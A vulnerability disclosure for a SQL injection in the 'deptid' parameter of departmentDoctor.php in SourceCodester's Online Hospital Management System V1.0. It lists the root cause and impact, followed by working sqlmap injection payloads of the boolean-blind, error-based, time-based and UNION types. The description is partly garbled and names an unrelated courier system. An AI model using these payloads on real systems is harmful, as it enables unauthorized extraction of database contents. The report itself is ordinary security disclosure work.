SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability

[1097hzy]

SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability

NAME OF AFFECTED PRODUCT(S)

• Online Hospital Management System Using PHP/MySQL

Vendor Homepage

• https://www.sourcecodester.com/php/14386/online-hospital-management-system-using-phpmysql.html

AFFECTED AND/OR FIXED VERSION(S)

submitter

• ZhaoBin Huang

Vulnerable File

• departmentDoctor.php

VERSION(S)

• V1.0

Software Link

• https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/online_hospital_management_system.zip

PROBLEM TYPE

Vulnerability Type

• SQL injection

Root Cause

• The fourth line of the departmentDoctor.php file uses the PHP method to retrieve user input from the $_GET element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 5 of the departmentDoctor.php file. This may lead to SQL injection attacks
• 

Impact

• Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.

DESCRIPTION

• ZhaoBin Huang has discovered that due to insufficient protection of the "deptid" parameter in the "\departmentDoctor.php" file, "Best courier management system project in php" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.database.

Payload

• deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
• 

---
Parameter: deptid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: deptid=12' AND 9424=9424 AND 'hYov'='hYov
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: deptid=12' AND (SELECT 3022 FROM (SELECT(SLEEP(5)))IfUz) AND 'rvxr'='rvxr
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: deptid=12' UNION ALL SELECT CONCAT(0x716b707671,0x6b5a4352647756625962434873434d55424c6d437a47745664726d4b736c52667772717653687444,0x71786a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

• This is showing the payload implemented by running sqlmap
• 
• The following is the database name displayed as a successful implementation of the attack by running sqlmap
•